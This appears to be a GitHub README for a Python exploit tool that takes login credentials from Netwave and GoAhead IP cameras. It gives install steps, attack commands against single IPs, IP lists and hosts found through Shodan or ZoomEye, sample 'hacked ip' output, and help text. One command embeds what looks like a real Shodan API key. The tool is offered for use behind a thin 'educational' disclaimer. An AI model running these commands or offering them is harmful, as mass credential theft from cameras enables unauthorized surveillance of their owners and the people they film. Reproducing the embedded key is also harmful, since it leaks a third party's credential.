Netwave-GoAhead

Exploit Netwave and GoAhead IP Camera Environment:Linux,Python3 Attention:this tool is just for educational!
Please comply with local laws and regulations!

Installation

• git clone https://github.com/kienquoc102/Netwave-GoAhead-Exploits

• pip3 install -r ./related.txt

Code Exploit:

• cd Netwave-GoAhead-Exploits

• python3 exploit.py -b 2 -l iplist.txt -v

• python3 exploit.py -b 2 -v --shodan ( your API Key shodan )

Or:

• python3 exploit.py -b 2 -l iplist.txt -v

• Example: python3 exploit.py -b 1 -i [IP:PORT] -v

• Demo: python3 exploit.py -b 1 -i 192.168.1.100:80 -v

Inherent Error:

    *If you enter the same password as in the detected tool but can't log in, please leave it blank
    *Example pasword Blank: IPCAM, ChinaNet, B-LINK-fuwuqi.....
there will be hacked ip and it says like this: 
------------------------------------------------------------------------------------------------
    [+]The ip:192.168.120.1,port:81,username:Location: /admin (Example IP)
    [+]The ip:192.168.120.1,port:81,password:<meta name="generator" content="vBulletin 5.5.4" />
------------------------------------------------------------------------------------------------
then please leave that address, because it's not ip camera

Main Hack:

Hacked Successful:

Help

python3 exploit.py -h  

usage: exploit.py [-h] [-b {1,2}] [-o OUTPUTFILE] [-T TIMEOUT]  
    	                 [-t TASKS] [-q | -v]   
			 [-i IP | -l INPUTFILE | --shodan SHODAN | --zoomeye ZOOMEYE]

Exploit IP Camera. Please use it just in educational purpose!  

optional arguments:  
  -h, --help     show this help message and exit  
  -b {1,2},--brand {1,2}  
	         Choose the brand of IP Camera. 1 represents Netwave,2  
                 represents GoAhead.  
  -o OUTPUTFILE,--output OUTPUTFILE  
	         Output into path you input.The default path in dir /tmp  
  -T TIMEOUT,--timeout TIMEOUT  
	         The default timout for netwave is 300s.  
  -t TASKS,--task TASKS  
                 Run TASKS number of connects in parallel,default is 10  
  -c COUNT,--count COUNT
		 The number of ip you want to get from ZoomEye.The maximum is 2000. Default is 100.
  -q,--quiet     Quiet mode.  
  -v,--verbose   Show more informations.  
  -i IP,--ip IP  The camera's ip and port.Example: 192.168.1.100:80  
  -l INPUTFILE,--list INPUTFILE  
	         The camera's ip:port address file. The file's format  
		 like this 192.168.1.100:80 in a line.  
  --shodan SHODAN
		 Your Shodan API Key. You can get help from https://www.shodan.io/

Example

1.Victim IP Camera's brand is Netwave.The ip is 192.168.1.100 and port is 80.

python3 netwave_camera.py -b 1 -i 192.168.1.100:80 -v  

2.Victim IP Camera's brand is GoAhead.The iplist.txt is given.
The iplist.txt show as below:
192.168.1.10:80
192.168.1.100:81
192.168.1.200:8080

python3 exploit.py -b 2 -l iplist.txt -v

3.Use Shodan API Key to exploit GoAhead.(The API Key is from shodan.io.)

python3 exploit.py -b 2 -v --shodan rrgYhgIMtnrPtfKdiVvWKtyQyY94goA0